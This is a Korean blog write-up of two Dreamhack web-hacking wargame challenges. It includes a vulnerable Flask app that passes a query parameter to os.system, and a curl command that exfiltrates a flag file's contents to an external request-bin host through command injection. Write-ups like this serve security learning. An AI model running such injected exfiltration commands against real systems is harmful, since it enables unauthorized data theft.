STAGE 10 : Web Hacking Epilogue

 

Epilogue

 

> Carve Party

 

 

 

10000번을 클릭하고 플래그를 획득하는 문제이다.

호박을 클릭하였더니 아래와 같이 정말 숫자가 줄어들고 있었다.

 

코드를 살펴보았는데 counter가 특정 수까지 내려갈때마다 다른 css가 적용되는 것을 알 수 있었다.  

 

$('#jack-target').click() 함수가 counter을 늘려준다.

 

콘솔에 아래와 같이 입력하여 클릭을 자동화할 수 있도록 하였다.

 

이를 통해 flag를 획득하였다.

 

 

> blind-command

 

문제의 초기 화면이다.

#!/usr/bin/env python3
from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/' , methods=['GET'])
def index():
    cmd = request.args.get('cmd', '')
    if not cmd:
        return "?cmd=[cmd]"

    if request.method == 'GET':
        ''
    else:
        os.system(cmd)
    return cmd

app.run(host='0.0.0.0', port=8000)

url에 ?cmd=ls를 입력해주었더니 위와 같이 ls가 나오는 것을 확인할 수 있었다.

이를 burp suite를 통해 확인해보았다.

 

Dreamhack tools의 request bin을 이용하여 curl로 데이터를 전송하였다.

 

curl https://qfouqyh.request.dreamhack.games -d $(cat flag.py | tr -d ' |\n')

위 처럼 작성하여 인코딩을 해주었더니 아래와 같은 결과를 얻었다.

 

 

이를 이용하여 burpsuite에 작성해주었다.

 

이를 실행하였더니 Body에서 FLAG를 획득할 수 있었다.

 

참고 : https://velog.io/@h0meb0dy/DreamHack-blind-command

'Web Hacking > Dreamhack' 카테고리의 다른 글

[Dreamhack] Web Hacking STAGE 9  (0) 2022.08.24
[Dreamhack] Web Hacking STAGE 8  (0) 2022.08.18
[Dreamhack] Web Hacking STAGE 7  (0) 2022.08.09
[Dreamhack] Web Hacking STAGE 6  (0) 2022.08.02
[Dreamhack] Web Hacking STAGE 5  (0) 2022.07.25

+ Recent posts

티스토리툴바